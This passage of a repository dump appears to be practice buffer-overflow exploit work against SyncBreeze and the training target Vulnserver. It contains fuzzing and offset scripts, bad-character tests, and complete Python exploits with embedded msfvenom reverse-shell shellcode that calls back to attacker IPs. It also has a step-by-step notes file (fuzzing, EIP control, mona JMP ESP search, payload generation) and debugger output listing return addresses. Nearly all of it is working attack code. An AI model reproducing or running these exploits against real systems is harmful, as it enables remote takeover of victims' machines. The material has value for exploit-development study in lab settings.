25 | expl.close() -------------------------------------------------------------------------------- /BufferOverflow/SyncBreeze-Server/Offset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys 5 | 6 | crash = "A" * 780 + "V" * 4 7 | crash += "C" * (100-len(crash)) 8 | 9 | fuzz="username="+crash+"&password=A" 10 | 11 | buffer="POST /login HTTP/1.1\r\n" 12 | buffer+="Host: 192.1.0.134\r\n" 13 | buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n" 14 | buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" 15 | buffer+="Accept-Language: en-US,en;q=0.5\r\n" 16 | buffer+="Referer: http://192.168.0.134/login\r\n" 17 | buffer+="Connection: close\r\n" 18 | buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 19 | buffer+="Content-Length: "+str(len(fuzz))+"\r\n" 20 | buffer+="\r\n" 21 | buffer+=fuzz 22 | 23 | expl = socket.socket (socket.AF_INET, socket.SOCK_STREAM) 24 | expl.connect(("192.168.0.134", 80)) 25 | expl.send(buffer) 26 | expl.close() -------------------------------------------------------------------------------- /BufferOverflow/SyncBreeze-Server/Pattern.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys 5 | 6 | crash = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" 7 | 8 | fuzz="username="+crash+"&password=A" 9 | 10 | buffer="POST /login HTTP/1.1\r\n" 11 | buffer+="Host: 192.1.0.134\r\n" 12 | buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n" 13 | buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" 14 | buffer+="Accept-Language: en-US,en;q=0.5\r\n" 15 | buffer+="Referer: http://192.168.0.134/login\r\n" 16 | buffer+="Connection: close\r\n" 17 | buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 18 | buffer+="Content-Length: "+str(len(fuzz))+"\r\n" 19 | buffer+="\r\n" 20 | buffer+=fuzz 21 | 22 | expl = socket.socket (socket.AF_INET, socket.SOCK_STREAM) 23 | expl.connect(("192.168.0.134", 80)) 24 | expl.send(buffer) 25 | expl.close() -------------------------------------------------------------------------------- /BufferOverflow/SyncBreeze-Server/Shellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys 5 | import struct 6 | 7 | #msfvenom -p windows/shell_reverse_tcp LHOS=192.168.0.135 LPORT=1234 EXITFUNC=thread -f c -b "\x00\x0a\x0d\x25\x26\x2b\x3d" 8 | 9 | Shellcode=("\xdb\xc4\xbd\x89\x4e\xa1\xdf\xd9\x74\x24\xf4\x5b\x29\xc9\xb1" 10 | "\x52\x31\x6b\x17\x83\xc3\x04\x03\xe2\x5d\x43\x2a\x08\x89\x01" 11 | "\xd5\xf0\x4a\x66\x5f\x15\x7b\xa6\x3b\x5e\x2c\x16\x4f\x32\xc1" 12 | "\xdd\x1d\xa6\x52\x93\x89\xc9\xd3\x1e\xec\xe4\xe4\x33\xcc\x67" 13 | "\x67\x4e\x01\x47\x56\x81\x54\x86\x9f\xfc\x95\xda\x48\x8a\x08" 14 | "\xca\xfd\xc6\x90\x61\x4d\xc6\x90\x96\x06\xe9\xb1\x09\x1c\xb0" 15 | "\x11\xa8\xf1\xc8\x1b\xb2\x16\xf4\xd2\x49\xec\x82\xe4\x9b\x3c" 16 | "\x6a\x4a\xe2\xf0\x99\x92\x23\x36\x42\xe1\x5d\x44\xff\xf2\x9a" 17 | "\x36\xdb\x77\x38\x90\xa8\x20\xe4\x20\x7c\xb6\x6f\x2e\xc9\xbc" 18 | "\x37\x33\xcc\x11\x4c\x4f\x45\x94\x82\xd9\x1d\xb3\x06\x81\xc6" 19 | "\xda\x1f\x6f\xa8\xe3\x7f\xd0\x15\x46\xf4\xfd\x42\xfb\x57\x6a" 20 | "\xa6\x36\x67\x6a\xa0\x41\x14\x58\x6f\xfa\xb2\xd0\xf8\x24\x45" 21 | "\x16\xd3\x91\xd9\xe9\xdc\xe1\xf0\x2d\x88\xb1\x6a\x87\xb1\x59" 22 | "\x6a\x28\x64\xcd\x3a\x86\xd7\xae\xea\x66\x88\x46\xe0\x68\xf7" 23 | "\x77\x0b\xa3\x90\x12\xf6\x24\x5f\x4a\xf8\x33\x37\x89\xf8\x3f" 24 | "\x1a\x04\x1e\x55\x8a\x41\x89\xc2\x33\xc8\x41\x72\xbb\xc6\x2c" 25 | "\xb4\x37\xe5\xd1\x7b\xb0\x80\xc1\xec\x30\xdf\xbb\xbb\x4f\xf5" 26 | "\xd3\x20\xdd\x92\x23\x2e\xfe\x0c\x74\x67\x30\x45\x10\x95\x6b" 27 | "\xff\x06\x64\xed\x38\x82\xb3\xce\xc7\x0b\x31\x6a\xec\x1b\x8f" 28 | "\x73\xa8\x4f\x5f\x22\x66\x39\x19\x9c\xc8\x93\xf3\x73\x83\x73" 29 | "\x85\xbf\x14\x05\x8a\x95\xe2\xe9\x3b\x40\xb3\x16\xf3\x04\x33" 30 | "\x6f\xe9\xb4\xbc\xba\xa9\xd5\x5e\x6e\xc4\x7d\xc7\xfb\x65\xe0" 31 | "\xf8\xd6\xaa\x1d\x7b\xd2\x52\xda\x63\x97\x57\xa6\x23\x44\x2a" 32 | "\xb7\xc1\x6a\x99\xb8\xc3") 33 | 34 | 35 | jmp_esp= struct.pack(" !mona find -s "\xff\xe4" -m shell32.dll 23 | 0x7719BC93 24 | 25 | -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/Eip_control.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | Shellcode="A" * 2003 +"B" * 4 5 | 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print("Sending pattern to Remote server....." ) 11 | s.send(('TRUN /.:/'+ Shellcode)) 12 | s.close() 13 | 14 | except: 15 | print("Error in connecting") 16 | sys.exit() 17 | -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/ShellCode.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | "Ret address=>625011AF" 5 | 6 | exploit=("\xda\xc0\xbb\x46\xaa\xba\x69\xd9\x74\x24\xf4\x58\x29\xc9\xb1" 7 | "\x52\x31\x58\x17\x03\x58\x17\x83\xae\x56\x58\x9c\xd2\x4f\x1f" 8 | "\x5f\x2a\x90\x40\xe9\xcf\xa1\x40\x8d\x84\x92\x70\xc5\xc8\x1e" 9 | "\xfa\x8b\xf8\x95\x8e\x03\x0f\x1d\x24\x72\x3e\x9e\x15\x46\x21" 10 | "\x1c\x64\x9b\x81\x1d\xa7\xee\xc0\x5a\xda\x03\x90\x33\x90\xb6" 11 | "\x04\x37\xec\x0a\xaf\x0b\xe0\x0a\x4c\xdb\x03\x3a\xc3\x57\x5a" 12 | "\x9c\xe2\xb4\xd6\x95\xfc\xd9\xd3\x6c\x77\x29\xaf\x6e\x51\x63" 13 | "\x50\xdc\x9c\x4b\xa3\x1c\xd9\x6c\x5c\x6b\x13\x8f\xe1\x6c\xe0" 14 | "\xed\x3d\xf8\xf2\x56\xb5\x5a\xde\x67\x1a\x3c\x95\x64\xd7\x4a" 15 | "\xf1\x68\xe6\x9f\x8a\x95\x63\x1e\x5c\x1c\x37\x05\x78\x44\xe3" 16 | "\x24\xd9\x20\x42\x58\x39\x8b\x3b\xfc\x32\x26\x2f\x8d\x19\x2f" 17 | "\x9c\xbc\xa1\xaf\x8a\xb7\xd2\x9d\x15\x6c\x7c\xae\xde\xaa\x7b" 18 | "\xd1\xf4\x0b\x13\x2c\xf7\x6b\x3a\xeb\xa3\x3b\x54\xda\xcb\xd7" 19 | "\xa4\xe3\x19\x77\xf4\x4b\xf2\x38\xa4\x2b\xa2\xd0\xae\xa3\x9d" 20 | "\xc1\xd1\x69\xb6\x68\x28\xfa\x79\xc4\x33\x69\x11\x17\x33\x89" 21 | "\x30\x9e\xd5\xfb\xa4\xf7\x4e\x94\x5d\x52\x04\x05\xa1\x48\x61" 22 | "\x05\x29\x7f\x96\xc8\xda\x0a\x84\xbd\x2a\x41\xf6\x68\x34\x7f" 23 | "\x9e\xf7\xa7\xe4\x5e\x71\xd4\xb2\x09\xd6\x2a\xcb\xdf\xca\x15" 24 | "\x65\xfd\x16\xc3\x4e\x45\xcd\x30\x50\x44\x80\x0d\x76\x56\x5c" 25 | "\x8d\x32\x02\x30\xd8\xec\xfc\xf6\xb2\x5e\x56\xa1\x69\x09\x3e" 26 | "\x34\x42\x8a\x38\x39\x8f\x7c\xa4\x88\x66\x39\xdb\x25\xef\xcd" 27 | "\xa4\x5b\x8f\x32\x7f\xd8\xaf\xd0\x55\x15\x58\x4d\x3c\x94\x05" 28 | "\x6e\xeb\xdb\x33\xed\x19\xa4\xc7\xed\x68\xa1\x8c\xa9\x81\xdb" 29 | "\x9d\x5f\xa5\x48\x9d\x75") 30 | 31 | 32 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" + "\x90" *32 +exploit 33 | 34 | try: 35 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 36 | s.connect(('192.168.1.133',9999)) 37 | print("Sending pattern to Remote server....." ) 38 | s.send(('TRUN /.:/'+ Shellcode)) 39 | s.close() 40 | 41 | except: 42 | print("Error in connecting") 43 | sys.exit() 44 | -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/bad_char: -------------------------------------------------------------------------------- 1 | badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 2 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 3 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 4 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 5 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 6 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 7 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 8 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 9 | -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/bad_char.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 5 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 6 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 7 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 8 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 9 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 10 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 11 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 12 | 13 | Shellcode="A" * 2003 +"B" * 4 + badchars 14 | 15 | 16 | try: 17 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 18 | s.connect(('192.168.1.133',9999)) 19 | print("Sending pattern to Remote server....." ) 20 | s.send(('TRUN /.:/'+ Shellcode)) 21 | s.close() 22 | 23 | except: 24 | print("Error in connecting") 25 | sys.exit() 26 | -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/exploit_code: -------------------------------------------------------------------------------- 1 | msfvenom -p windows/shell_reverse_tcp LHOS=192.168.1.147 LPORT=1234 EXITFUNC=thread -f c -b "\x00" 2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload 3 | [-] No arch selected, selecting arch: x86 from the payload 4 | Found 11 compatible encoders 5 | Attempting to encode payload with 1 iterations of x86/shikata_ga_nai 6 | x86/shikata_ga_nai succeeded with size 351 (iteration=0) 7 | x86/shikata_ga_nai chosen with final size 351 8 | Payload size: 351 bytes 9 | Final size of c file: 1500 bytes 10 | unsigned char buf[] = 11 | "\xdb\xd1\xbb\xb1\x96\x2f\x26\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 12 | "\x52\x83\xc2\x04\x31\x5a\x13\x03\xeb\x85\xcd\xd3\xf7\x42\x93" 13 | "\x1c\x07\x93\xf4\x95\xe2\xa2\x34\xc1\x67\x94\x84\x81\x25\x19" 14 | "\x6e\xc7\xdd\xaa\x02\xc0\xd2\x1b\xa8\x36\xdd\x9c\x81\x0b\x7c" 15 | "\x1f\xd8\x5f\x5e\x1e\x13\x92\x9f\x67\x4e\x5f\xcd\x30\x04\xf2" 16 | "\xe1\x35\x50\xcf\x8a\x06\x74\x57\x6f\xde\x77\x76\x3e\x54\x2e" 17 | "\x58\xc1\xb9\x5a\xd1\xd9\xde\x67\xab\x52\x14\x13\x2a\xb2\x64" 18 | "\xdc\x81\xfb\x48\x2f\xdb\x3c\x6e\xd0\xae\x34\x8c\x6d\xa9\x83" 19 | "\xee\xa9\x3c\x17\x48\x39\xe6\xf3\x68\xee\x71\x70\x66\x5b\xf5" 20 | "\xde\x6b\x5a\xda\x55\x97\xd7\xdd\xb9\x11\xa3\xf9\x1d\x79\x77" 21 | "\x63\x04\x27\xd6\x9c\x56\x88\x87\x38\x1d\x25\xd3\x30\x7c\x22" 22 | "\x10\x79\x7e\xb2\x3e\x0a\x0d\x80\xe1\xa0\x99\xa8\x6a\x6f\x5e" 23 | "\xce\x40\xd7\xf0\x31\x6b\x28\xd9\xf5\x3f\x78\x71\xdf\x3f\x13" 24 | "\x81\xe0\x95\xb4\xd1\x4e\x46\x75\x81\x2e\x36\x1d\xcb\xa0\x69" 25 | "\x3d\xf4\x6a\x02\xd4\x0f\xfd\xed\x81\x0e\x6e\x85\xd3\x10\x94" 26 | "\x84\x5d\xf6\xfe\x38\x08\xa1\x96\xa1\x11\x39\x06\x2d\x8c\x44" 27 | "\x08\xa5\x23\xb9\xc7\x4e\x49\xa9\xb0\xbe\x04\x93\x17\xc0\xb2" 28 | "\xbb\xf4\x53\x59\x3b\x72\x48\xf6\x6c\xd3\xbe\x0f\xf8\xc9\x99" 29 | "\xb9\x1e\x10\x7f\x81\x9a\xcf\xbc\x0c\x23\x9d\xf9\x2a\x33\x5b" 30 | "\x01\x77\x67\x33\x54\x21\xd1\xf5\x0e\x83\x8b\xaf\xfd\x4d\x5b" 31 | "\x29\xce\x4d\x1d\x36\x1b\x38\xc1\x87\xf2\x7d\xfe\x28\x93\x89" 32 | "\x87\x54\x03\x75\x52\xdd\x23\x94\x76\x28\xcc\x01\x13\x91\x91" 33 | "\xb1\xce\xd6\xaf\x31\xfa\xa6\x4b\x29\x8f\xa3\x10\xed\x7c\xde" 34 | "\x09\x98\x82\x4d\x29\x89"; 35 | -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/fuzz.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | from time import sleep 3 | 4 | buffer ="A" * 100 5 | 6 | while True: 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print "Trying with buffer length %d" % len(buffer) 11 | s.send(('LTER /.:/'+ buffer)) 12 | s.close() 13 | sleep(1) 14 | buffer=buffer + "A"*100 15 | 16 | 17 | except: 18 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 19 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/index: -------------------------------------------------------------------------------- 1 | Vuln Server part 2 LTER 2 | 3 | 4 | A. Spiking =>generic_send_tcp 192.168.1.133 9999 spike.spk 0 0 5 | 6 | 7 | B. Fuzzing => buyffer crash at 2100 8 | 9 | 10 | C. Findinf offset=> 11 | /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2100 12 | 13 | EIP Pointer-=> 386F4337 14 | 15 | D. Finding exject buffer buffer sdpace via offset 16 | 17 | /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2100 -q 386F4337 18 | 19 | Exject Match=> 2003 20 | 21 | 22 | E. Controloing EIP { Shellcode="A" * 2003 +"B" * 4 } 23 | 24 | F FInding bad chacacter Shellcode="A" * 2003 +"B" * 4 + bad_char 25 | 26 | "\x00" + 27 | 28 | G: modules to set find exject ESP address DLL 29 | { 30 | !mona modules => 31 | 32 | Address=0BADF00D [essfunc.dll] (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 33 | 34 | Address=0BADF00D [vulnserver.exe] (C:\Users\vinod\Desktop\Vul UFF\vulnserver.exe) 35 | 36 | } 37 | 38 | H Finding JMP ESP modules for "FFE4" 39 | 40 | !mona find -s "\xff\xe4" -m essfunc.dll 41 | return address=> 42 | Address=625011AF 43 | Address=625011BB 44 | Address=625011C7 45 | Address=625011D3 46 | Address=625011DF 47 | Address=625011EB 48 | Address=625011F7 49 | Address=62501203 50 | Address=62501205 51 | 52 | I G: Check for EIP contril and vreak point 53 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" 54 | 55 | H: shell code 56 | msfvenom -p windows/shell_reverse_tcp LHOS=192.168.1.147 LPORT=1234 EXITFUNC=thread -f c -b "\x00" -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/offset.py: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | import sys, socket 3 | 4 | 5 | offset="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9" 6 | 7 | 8 | try: 9 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 10 | s.connect(('192.168.1.133',9999)) 11 | print("Sending pattern to Remote server" ) 12 | s.send(('TRUN /.:/'+ offset)) 13 | s.close() 14 | 15 | except: 16 | print("Error in connecting") 17 | sys.exit() 18 | -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/ret_add: -------------------------------------------------------------------------------- 1 | Log data, item 11 2 | Address=625011AF 3 | Message= 0x625011af : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 4 | 5 | 6 | Log data, item 10 7 | Address=625011BB 8 | Message= 0x625011bb : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 9 | 10 | Log data, item 9 11 | Address=625011C7 12 | Message= 0x625011c7 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 13 | 14 | Log data, item 8 15 | Address=625011D3 16 | Message= 0x625011d3 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 17 | 18 | Log data, item 7 19 | Address=625011DF 20 | Message= 0x625011df : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 21 | 22 | Log data, item 6 23 | Address=625011EB 24 | Message= 0x625011eb : "\xff\xe4" | {PAGE_EXECUTE_READ} 